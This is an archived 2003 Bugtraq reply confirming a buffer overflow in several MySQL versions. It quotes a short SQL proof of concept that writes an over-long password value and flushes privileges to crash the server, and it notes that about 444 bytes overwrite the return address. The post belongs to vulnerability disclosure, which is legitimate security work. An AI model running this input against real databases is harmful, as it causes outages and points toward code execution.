| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 11 Sep 2003 13:41:29 +0300 From: Konstantin Tsolov <ktsolov@...l.bg> To: bugtraq@...urityfocus.com Subject: Re: Buffer overflow in MySQL managed to replicate on 4.0.13 (custom made) running on slack8.1 with mysql.mysql. 3.23.51 (the distro mysql version) also proved vulnerable. nb: just make sure you have a backup copy of your mysql db when testing this harmless proof of concept on your production server :-) > successful exploitation of that bug is trivial on some platforms. On most > Linux systems the return address needs about 444 bytes to get overwritten. > > Harmless proof of concept : > > USE mysql; > > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT; > > UPDATE User SET Password = > > '123456781234567812345678123456781234567812345678123456781234567812345678 > 123456781234567812345678123456781234567812345678123456781234567812345678 > 123456781234567812345678123456781234567812345678123456781234567812345678 > 12345678123456781234567812345678...' WHERE User = 'abcd'; > > > FLUSH PRIVILEGES; > > [Connection lost] -- "Talk is cheap because supply always exceeds demand." -- source unknown +------------------------------------------------------+ | Konstantin Tsolov ktsolov at etel dot bg | | Systems Administrator - VoIP | | eTel Ltd. www.etel.bg | | Sofia, Bulgaria | +------------------------------------------------------+
Powered by blists - more mailing lists